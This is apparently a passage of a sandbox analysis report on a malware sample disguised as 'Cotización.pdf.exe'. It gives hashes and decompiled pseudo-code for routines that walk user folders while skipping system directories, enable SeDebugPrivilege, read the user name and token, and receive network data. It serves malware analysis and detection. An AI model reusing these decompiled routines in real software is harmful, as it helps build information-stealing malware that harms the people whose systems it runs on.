                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cea2034ac40a6efe003ff9c1f95fea175c7876da23dd1968925b0b4274721cad
                                      • Instruction ID: da4b0253d05a412b02f13f034f1d50830ba1ededdb6e06bbd9423f0f17fadf99
                                      • Opcode Fuzzy Hash: cea2034ac40a6efe003ff9c1f95fea175c7876da23dd1968925b0b4274721cad
                                      • Instruction Fuzzy Hash: D051E6B0E1520A9BCB48CFEAC4815AEFBF2BF99300F24D46AC425B7254D3349A51CF95
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 071C92C0, Relevance: .1, Instructions: 123COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.297458614.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: fac623a6240573cce3c551df54728faa7b960e62c3a8c762e0f989d140022699
                                      • Instruction ID: 564389be0b7126c709df4781576177f95769ae8522084410907f174771c07ad1
                                      • Opcode Fuzzy Hash: fac623a6240573cce3c551df54728faa7b960e62c3a8c762e0f989d140022699
                                      • Instruction Fuzzy Hash: 64512CB1E1161A8BDB68CF66C944799FBB2BFC9300F1482BAC509A7650EB705AC59F40
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 071C3DB8, Relevance: .1, Instructions: 107COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.297458614.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3cf3193cb6598b41088afb04a98a15bc9f5fcba78bcbaf3d5c2ce209dc937456
                                      • Instruction ID: 93b5158a93ccabe01a5034d6252ef41a39eb34ee347a0028ff3d0477c248121c
                                      • Opcode Fuzzy Hash: 3cf3193cb6598b41088afb04a98a15bc9f5fcba78bcbaf3d5c2ce209dc937456
                                      • Instruction Fuzzy Hash: D541D3B4E1520ADFCB08CFEAC5815AEFBF2BF89200F24C46AC415F7254E7349A558B95
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 071C7B80, Relevance: .1, Instructions: 105COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.297458614.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d61e843153c34bac08c5beb280ea3b196447c844976d6cb9661f552730616f9c
                                      • Instruction ID: 9b304d389a7044fdb64a55c7ba24a9a7ff1ac7d519bffbc28b98dce3f5576fc0
                                      • Opcode Fuzzy Hash: d61e843153c34bac08c5beb280ea3b196447c844976d6cb9661f552730616f9c
                                      • Instruction Fuzzy Hash: 1E414BB0E112199FDB58CFAAD981B9EFBF6FB89210F14C06AD408A7394D7705A45CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 071C7B73, Relevance: .1, Instructions: 102COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.297458614.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 26b69c417045de27203283e5c50b665a65fa6035c7f7024c821aabdeb75a40e8
                                      • Instruction ID: 5229eaf364554f69f473093b9fdfe8207bff6ceeefd22551119a65e4871acafc
                                      • Opcode Fuzzy Hash: 26b69c417045de27203283e5c50b665a65fa6035c7f7024c821aabdeb75a40e8
                                      • Instruction Fuzzy Hash: 4E416CB0E112199FDB58CFAAC941B9EFBF6EF89210F14C0AAD408A7395DB704A45CF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 071C3DC8, Relevance: .1, Instructions: 102COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.297458614.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8210eac5ed726192cc321f9c44ebbf6facc6a07827148d8cffa52f0def7ced56
                                      • Instruction ID: c32d63edac490d00246f3e4d5191860019a518cada86fef7cbf6e282d3d7c8a4
                                      • Opcode Fuzzy Hash: 8210eac5ed726192cc321f9c44ebbf6facc6a07827148d8cffa52f0def7ced56
                                      • Instruction Fuzzy Hash: FE41D3B0E1420ADFCB08CFEAC5815EEFBF2BB99200F64C56AC419B7244D7349A418F95
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 071C94BC, Relevance: .1, Instructions: 97COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.297458614.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2dcaffcec1b9c657fb418ea469bc36dd09946f0b952cb3cabc02d11760e40f7a
                                      • Instruction ID: b48e52e754e0978ea5d74c03852bab36ae2c940d4cbd322700bfb77db285f3d5
                                      • Opcode Fuzzy Hash: 2dcaffcec1b9c657fb418ea469bc36dd09946f0b952cb3cabc02d11760e40f7a
                                      • Instruction Fuzzy Hash: 3A415BB4E5161A8BCB68CF65C944B99FBB2FF99300F1192EAC119A7640E7309EC08F40
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 071C94FC, Relevance: .1, Instructions: 94COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.297458614.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: c3b9357ec22a3b43d993253d3158951f28dc72b78ac605f773aeb6c46bda8662
                                      • Instruction ID: f6bd5c7fae6fe40d74b89570e37d57a957183bbfd95e8b58d29b4f93834400fc
                                      • Opcode Fuzzy Hash: c3b9357ec22a3b43d993253d3158951f28dc72b78ac605f773aeb6c46bda8662
                                      • Instruction Fuzzy Hash: 81415DB4D5162ACBCB64CF61C940BD9B7B2FF99300F1186EAC509A7680EB749AC0CF40
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 071C6900, Relevance: .1, Instructions: 77COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.297458614.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6a4f8a1691bcc76a384a1286458bf13135e38e044af0cc9c499523bbb64755fb
                                      • Instruction ID: 9bc79f8fff7c6c2d3fa487663edd33f262b1dff002ed7a8b1451d29471dbcb65
                                      • Opcode Fuzzy Hash: 6a4f8a1691bcc76a384a1286458bf13135e38e044af0cc9c499523bbb64755fb
                                      • Instruction Fuzzy Hash: AA314BB1E112099FDB48CFAAD94169EBBF6BF89300F14C06AD808A7254DB714A41CB91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 071C6910, Relevance: .1, Instructions: 60COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.297458614.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 49c367387846bbd0365b67b888f2daf57c1b0ab4fd484a95f31d9e3522cdfabf
                                      • Instruction ID: 68ba51625196aff8a46010d88910c713aa586d865529ab136dcc173a90fec073
                                      • Opcode Fuzzy Hash: 49c367387846bbd0365b67b888f2daf57c1b0ab4fd484a95f31d9e3522cdfabf
                                      • Instruction Fuzzy Hash: 3F1129B1E116199BDB08CFAAD9416EEFBF7FBC9310F14C07AD408A7254DB705A418B91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 071C3F90, Relevance: .1, Instructions: 59COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.297458614.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b0a5907b52ca6f84bbaf7593c514a6f2a0df78eae1af60d054c7f31ff0ab296e
                                      • Instruction ID: 93c9581c71fc1cd0ab1317070e9fb8cb23fd02241975957f411d81ee18afc836
                                      • Opcode Fuzzy Hash: b0a5907b52ca6f84bbaf7593c514a6f2a0df78eae1af60d054c7f31ff0ab296e
                                      • Instruction Fuzzy Hash: B111ADB1E056189BEB1CCFABD8446DEFAF7BFC8204F04C17AC918A6254EB3405568F51
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 071C3F80, Relevance: .1, Instructions: 56COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000002.00000002.297458614.00000000071C0000.00000040.00000001.sdmp, Offset: 071C0000, based on PE: false
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 47a078ab2c796afe35fa3e1d9898eb936c2d4bf59126047ccb047fa7485cb787
                                      • Instruction ID: 369938f824f02242adf4283d002776b950844715fe52986d0def75c8cce89e44
                                      • Opcode Fuzzy Hash: 47a078ab2c796afe35fa3e1d9898eb936c2d4bf59126047ccb047fa7485cb787
                                      • Instruction Fuzzy Hash: 8621C1B1E047589BEB58CFABD8446DEFBF7AFC8200F14C07AC818A6254EB3415468F51
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Analysis Process: Cotizaci#U00f3n.pdf.exe PID: 2644 Parent PID: 3492 Cotizaci#U00f3n.pdf.exeCOMMON

                                      Executed Functions

                                      Function 00403D74, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 200fileCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 85%
                                      			E00403D74(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				struct _WIN32_FIND_DATAW _v596;
				void* __ebx;
				void* _t35;
				int _t43;
				void* _t52;
				int _t56;
				intOrPtr _t60;
				void* _t66;
				void* _t73;
				void* _t74;
				WCHAR* _t98;
				void* _t99;
				void* _t100;
				void* _t101;
				WCHAR* _t102;
				void* _t103;
				void* _t104;

				L004067C4(0xa); // executed
				_t72 = 0;
				_t100 = 0x2e;
				_t106 = _a16;
				if(_a16 == 0) {
					L15:
					_push(_a8);
					_t98 = E00405B6F(0, L"%s\\%s", _a4);
					_t104 = _t103 + 0xc;
					if(_t98 == 0) {
						L30:
						__eflags = 0;
						return 0;
					}
					E004031E5(_t72, _t72, 0xd4f4acea, _t72, _t72);
					_t35 = FindFirstFileW(_t98,  &_v596); // executed
					_t73 = _t35;
					if(_t73 == 0xffffffff) {
						L29:
						E00402BAB(_t98);
						goto L30;
					}
					L17:
					while(1) {
						if(E00405D24( &(_v596.cFileName)) >= 3 || _v596.cFileName != _t100) {
							if(_v596.dwFileAttributes != 0x10) {
								L21:
								_push( &(_v596.cFileName));
								_t101 = E00405B6F(_t124, L"%s\\%s", _a4);
								_t104 = _t104 + 0xc;
								if(_t101 == 0) {
									goto L24;
								}
								if(_a12 == 0) {
									E00402BAB(_t98);
									E00403BEF(_t73);
									return _t101;
								}
								_a12(_t101);
								E00402BAB(_t101);
								goto L24;
							}
							_t124 = _a20;
							if(_a20 == 0) {
								goto L24;
							}
							goto L21;
						} else {
							L24:
							E004031E5(_t73, 0, 0xce4477cc, 0, 0);
							_t43 = FindNextFileW(_t73,  &_v596); // executed
							if(_t43 == 0) {
								E00403BEF(_t73); // executed
								goto L29;
							}
							_t100 = 0x2e;
							continue;
						}
					}
				}
				_t102 = E00405B6F(_t106, L"%s\\*", _a4);
				if(_t102 == 0) {
					L14:
					_t100 = 0x2e;
					goto L15;
				}
				E004031E5(0, 0, 0xd4f4acea, 0, 0);
				_t52 = FindFirstFileW(_t102,  &_v596); // executed
				_t74 = _t52;
				if(_t74 == 0xffffffff) {
					L13:
					E00402BAB(_t102);
					_t72 = 0;
					goto L14;
				} else {
					goto L3;
				}
				do {
					L3:
					if((_v596.dwFileAttributes & 0x00000010) == 0) {
						goto L11;
					}
					if(_a24 == 0) {
						L7:
						if(E00405D24( &(_v596.cFileName)) >= 3) {
							L9:
							_push( &(_v596.cFileName));
							_t60 = E00405B6F(_t114, L"%s\\%s", _a4);
							_t103 = _t103 + 0xc;
							_a16 = _t60;
							_t115 = _t60;
							if(_t60 == 0) {
								goto L11;
							}
							_t99 = E00403D74(_t115, _t60, _a8, _a12, 1, 0, 1);
							E00402BAB(_a16);
							_t103 = _t103 + 0x1c;
							if(_t99 != 0) {
								E00402BAB(_t102);
								E00403BEF(_t74);
								return _t99;
							}
							goto L11;
						}
						_t66 = 0x2e;
						_t114 = _v596.cFileName - _t66;
						if(_v596.cFileName == _t66) {
							goto L11;
						}
						goto L9;
					}
					_push(L"Windows");
					if(E00405EFF( &(_v596.cFileName)) != 0) {
						goto L11;
					}
					_push(L"Program Files");
					if(E00405EFF( &(_v596.cFileName)) != 0) {
						goto L11;
					}
					goto L7;
					L11:
					E004031E5(_t74, 0, 0xce4477cc, 0, 0);
					_t56 = FindNextFileW(_t74,  &_v596); // executed
				} while (_t56 != 0);
				E00403BEF(_t74); // executed
				goto L13;
			}




















                                      0x00403d82
                                      0x00403d88
                                      0x00403d8c
                                      0x00403d8d
                                      0x00403d90
                                      0x00403ea9
                                      0x00403ea9
                                      0x00403eb9
                                      0x00403ebb
                                      0x00403ec0
                                      0x00403f95
                                      0x00403f95
                                      0x00000000
                                      0x00403f95
                                      0x00403ece
                                      0x00403edb
                                      0x00403edd
                                      0x00403ee2
                                      0x00403f8e
                                      0x00403f8f
                                      0x00000000
                                      0x00403f94
                                      0x00000000
                                      0x00403ee8
                                      0x00403ef8
                                      0x00403f0a
                                      0x00403f12
                                      0x00403f18
                                      0x00403f26
                                      0x00403f28
                                      0x00403f2d
                                      0x00000000
                                      0x00000000
                                      0x00403f33
                                      0x00403f76
                                      0x00403f7c
                                      0x00000000
                                      0x00403f83
                                      0x00403f36
                                      0x00403f3a
                                      0x00000000
                                      0x00403f40
                                      0x00403f0c
                                      0x00403f10
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00403f41
                                      0x00403f41
                                      0x00403f4b
                                      0x00403f58
                                      0x00403f5c
                                      0x00403f88
                                      0x00000000
                                      0x00403f8d
                                      0x00403f60
                                      0x00000000
                                      0x00403f60
                                      0x00403ef8
                                      0x00403ee8
                                      0x00403da3
                                      0x00403da9
                                      0x00403ea6
                                      0x00403ea8
                                      0x00000000
                                      0x00403ea8
                                      0x00403db7
                                      0x00403dc4
                                      0x00403dc6
                                      0x00403dcb
                                      0x00403e9d
                                      0x00403e9e
                                      0x00403ea4
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00403dd1
                                      0x00403dd1
                                      0x00403dd8
                                      0x00000000
                                      0x00000000
                                      0x00403de2
                                      0x00403e12
                                      0x00403e22
                                      0x00403e30
                                      0x00403e36
                                      0x00403e3f
                                      0x00403e44
                                      0x00403e47
                                      0x00403e4a
                                      0x00403e4c
                                      0x00000000
                                      0x00000000
                                      0x00403e63
                                      0x00403e65
                                      0x00403e6a
                                      0x00403e6f
                                      0x00403f64
                                      0x00403f6a
                                      0x00000000
                                      0x00403f71
                                      0x00000000
                                      0x00403e6f
                                      0x00403e26
                                      0x00403e27
                                      0x00403e2e
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00403e2e
                                      0x00403dea
                                      0x00403df9
                                      0x00000000
                                      0x00000000
                                      0x00403e01
                                      0x00403e10
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00403e75
                                      0x00403e7f
                                      0x00403e8c
                                      0x00403e8e
                                      0x00403e97
                                      0x00000000

                                      APIs
                                      • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
                                      • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
                                      • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
                                      • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: FileFind$FirstNext
                                      • String ID: %s\%s$%s\*$Program Files$Windows
                                      • API String ID: 1690352074-2009209621
                                      • Opcode ID: 5c3a63efb33a22a8ff96110af9ee72305a9759e4f5ebb0566404c2b67a58fd17
                                      • Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
                                      • Opcode Fuzzy Hash: 5c3a63efb33a22a8ff96110af9ee72305a9759e4f5ebb0566404c2b67a58fd17
                                      • Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040650A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 78%
                                      			E0040650A(void* __eax, void* __ebx, void* __eflags) {
				void* _v8;
				struct _LUID _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				struct _TOKEN_PRIVILEGES _v32;
				intOrPtr* _t13;
				void* _t14;
				int _t16;
				int _t31;
				void* _t32;

				_t31 = 0;
				E004060AC();
				_t32 = __eax;
				_t13 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
				_t14 =  *_t13(_t32, 0x28,  &_v8);
				if(_t14 != 0) {
					E004031E5(__ebx, 9, 0xc6c3ecbb, 0, 0);
					_t16 = LookupPrivilegeValueW(0, L"SeDebugPrivilege",  &_v16); // executed
					if(_t16 != 0) {
						_push(__ebx);
						_v32.Privileges = _v16.LowPart;
						_v32.PrivilegeCount = 1;
						_v24 = _v16.HighPart;
						_v20 = 2;
						E004031E5(1, 9, 0xc1642df2, 0, 0);
						AdjustTokenPrivileges(_v8, 0,  &_v32, 0x10, 0, 0); // executed
						_t31 =  !=  ? 1 : 0;
					}
					E00403C40(_v8);
					return _t31;
				}
				return _t14;
			}













                                      0x00406512
                                      0x00406514
                                      0x00406522
                                      0x00406524
                                      0x00406530
                                      0x00406534
                                      0x0040653f
                                      0x0040654e
                                      0x00406552
                                      0x0040655a
                                      0x0040655f
                                      0x0040656d
                                      0x00406570
                                      0x00406573
                                      0x0040657a
                                      0x00406589
                                      0x0040658d
                                      0x00406590
                                      0x00406594
                                      0x00000000
                                      0x0040659a
                                      0x004065a1

                                      APIs
                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
                                      • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                                      • String ID: SeDebugPrivilege
                                      • API String ID: 3615134276-2896544425
                                      • Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                                      • Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
                                      • Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                                      • Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00402B7C, Relevance: 3.0, APIs: 2, Instructions: 20memoryCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00402B7C(long _a4) {
				void* _t4;
				void* _t7;

				_t4 = RtlAllocateHeap(GetProcessHeap(), 0, _a4); // executed
				_t7 = _t4;
				if(_t7 != 0) {
					E00402B4E(_t7, 0, _a4);
				}
				return _t7;
			}





                                      0x00402b8c
                                      0x00402b92
                                      0x00402b96
                                      0x00402b9e
                                      0x00402ba3
                                      0x00402baa

                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                      • RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateProcess
                                      • String ID:
                                      • API String ID: 1357844191-0
                                      • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                      • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                                      • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                      • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00406069, Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E00406069(WCHAR* _a4, DWORD* _a8) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 9, 0xd4449184, 0, 0);
				_t4 = GetUserNameW(_a4, _a8); // executed
				return _t4;
			}





                                      0x00406077
                                      0x00406082
                                      0x00406085

                                      APIs
                                      • GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: NameUser
                                      • String ID:
                                      • API String ID: 2645101109-0
                                      • Opcode ID: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                                      • Instruction ID: cd86427636297e763c0a42ccb852711c5927781faf2e94d4e6bb5dc6023ef8f2
                                      • Opcode Fuzzy Hash: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                                      • Instruction Fuzzy Hash: 93C04C711842087BFE116ED1DC06F483E199B45B59F104011B71C2C0D1D9F3A6516559
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00404ED4, Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: recv
                                      • String ID:
                                      • API String ID: 1507349165-0
                                      • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                      • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                                      • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                      • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004061C3, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 151COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 75%
                                      			E004061C3(void* __eax, void* __ebx, void* __eflags) {
				int _v8;
				long _v12;
				int _v16;
				int _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr* _t25;
				int _t27;
				int _t30;
				int _t31;
				int _t36;
				int _t37;
				intOrPtr* _t39;
				int _t40;
				long _t44;
				intOrPtr* _t45;
				int _t46;
				void* _t48;
				int _t49;
				void* _t67;
				void* _t68;
				void* _t74;

				_t48 = __ebx;
				_t67 = 0;
				_v8 = 0;
				E00402BF2();
				_t68 = __eax;
				_t25 = E004031E5(__ebx, 9, 0xe87a9e93, 0, 0);
				_t2 =  &_v8; // 0x414449
				_push(1);
				_push(8);
				_push(_t68);
				if( *_t25() != 0) {
					L4:
					_t27 = E00402B7C(0x208);
					_v20 = _t27;
					__eflags = _t27;
					if(_t27 != 0) {
						E0040338C(_t27, _t67, 0x104);
						_t74 = _t74 + 0xc;
					}
					_push(_t48);
					_t49 = E00402B7C(0x208);
					__eflags = _t49;
					if(_t49 != 0) {
						E0040338C(_t49, _t67, 0x104);
						_t74 = _t74 + 0xc;
					}
					_v28 = 0x208;
					_v24 = 0x208;
					_t7 =  &_v8; // 0x414449
					_v12 = _t67;
					E004031E5(_t49, 9, 0xecae3497, _t67, _t67);
					_t30 = GetTokenInformation( *_t7, 1, _t67, _t67,  &_v12); // executed
					__eflags = _t30;
					if(_t30 == 0) {
						_t36 = E00402B7C(_v12);
						_v16 = _t36;
						__eflags = _t36;
						if(_t36 != 0) {
							_t14 =  &_v8; // 0x414449, executed
							_t37 = E00406086( *_t14, 1, _t36, _v12,  &_v12); // executed
							__eflags = _t37;
							if(_t37 != 0) {
								_t39 = E004031E5(_t49, 9, 0xc0862e2b, _t67, _t67);
								_t40 =  *_t39(_t67,  *_v16, _v20,  &_v28, _t49,  &_v24,  &_v32); // executed
								__eflags = _t40;
								if(__eflags != 0) {
									_t67 = E00405B6F(__eflags, L"%s", _t49);
								}
							}
							E00402BAB(_v16);
						}
					}
					__eflags = _v8;
					if(_v8 != 0) {
						E00403C40(_v8); // executed
					}
					__eflags = _t49;
					if(_t49 != 0) {
						E00402BAB(_t49);
					}
					_t31 = _v20;
					__eflags = _t31;
					if(_t31 != 0) {
						E00402BAB(_t31);
					}
					return _t67;
				}
				_t44 = GetLastError();
				if(_t44 == 0x3f0) {
					E004060AC();
					_t45 = E004031E5(__ebx, 9, 0xea792a5f, 0, 0);
					_t3 =  &_v8; // 0x414449
					_t46 =  *_t45(_t44, 8, _t3);
					__eflags = _t46;
					if(_t46 == 0) {
						goto L2;
					}
					goto L4;
				}
				L2:
				return 0;
			}


























                                      0x004061c3
                                      0x004061cb
                                      0x004061cd
                                      0x004061d0
                                      0x004061de
                                      0x004061e0
                                      0x004061e5
                                      0x004061e9
                                      0x004061eb
                                      0x004061ed
                                      0x004061f2
                                      0x0040622a
                                      0x00406230
                                      0x00406235
                                      0x00406239
                                      0x0040623b
                                      0x00406244
                                      0x00406249
                                      0x00406249
                                      0x0040624c
                                      0x00406253
                                      0x00406256
                                      0x00406258
                                      0x00406261
                                      0x00406266
                                      0x00406266
                                      0x00406270
                                      0x00406273
                                      0x00406276
                                      0x0040627b
                                      0x0040627e
                                      0x0040628c
                                      0x0040628e
                                      0x00406290
                                      0x00406295
                                      0x0040629a
                                      0x0040629e
                                      0x004062a0
                                      0x004062ac
                                      0x004062af
                                      0x004062b7
                                      0x004062b9
                                      0x004062c9
                                      0x004062e0
                                      0x004062e2
                                      0x004062e4
                                      0x004062f3
                                      0x004062f3
                                      0x004062e4
                                      0x004062f8
                                      0x004062fd
                                      0x004062a0
                                      0x004062fe
                                      0x00406302
                                      0x00406307
                                      0x0040630c
                                      0x0040630d
                                      0x0040630f
                                      0x00406312
                                      0x00406317
                                      0x00406318
                                      0x0040631c
                                      0x0040631e
                                      0x00406321
                                      0x00406326
                                      0x00000000
                                      0x00406327
                                      0x004061f4
                                      0x004061ff
                                      0x00406208
                                      0x00406218
                                      0x0040621d
                                      0x00406224
                                      0x00406226
                                      0x00406228
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00406228
                                      0x00406201
                                      0x00000000

                                      APIs
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
                                      • _wmemset.LIBCMT ref: 00406244
                                      • _wmemset.LIBCMT ref: 00406261
                                      • GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.460712813.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                      Yara matches
                                      Similarity
                                      • API ID: _wmemset$ErrorInformationLastToken
                                      • String ID: IDA$IDA
                                      • API String ID: 487585393-2020647798
                                      • Opcode ID: cd662bacda138fad525beeffca010871ee416c8799393d48ee72f9c5f8360390
                                      • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                                      • Opcode Fuzzy Hash: cd662bacda138fad525beeffca010871ee416c8799393d48ee72f9c5f8360390
                                      • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00404E17, Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 37%
